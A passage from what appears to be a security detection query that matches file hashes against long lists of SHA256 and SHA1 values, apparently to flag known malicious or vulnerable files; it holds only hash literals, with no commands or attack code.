LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', 
'609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 
'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', 
'65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', 
'3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 
'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 
'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', 
'2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', 
'4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', 
'509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 
'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 